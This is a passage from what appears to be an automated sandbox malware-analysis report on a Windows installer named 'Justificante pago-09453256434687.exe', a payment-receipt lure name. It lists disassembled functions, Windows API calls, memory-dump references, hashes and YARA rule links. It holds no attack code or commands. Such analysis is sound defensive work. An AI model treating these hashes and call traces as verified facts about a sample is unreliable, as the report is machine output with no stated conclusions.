                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                                                                    • Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                                    • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                                                                                                                                                    • Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                                                                                                                                                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                                    • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                      • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                      • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2584051700-0
                                                                                                                                                                                    • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                    • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                    • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                    Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                    • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                    • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                                    Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                    • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                                    Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                                    • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                                                                                                                                                                    Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                                      • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                                    • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3248276644-3081826266
                                                                                                                                                                                    • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                                    • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                                                                                                                                                                    Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040550C
                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                                                                                                                                                                      • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                                    • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                                                                                                                                                                    Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00403B42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                                                                                                    • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                    • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                                                                                                                                                                    Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                                                                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003), ref: 00405E38
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
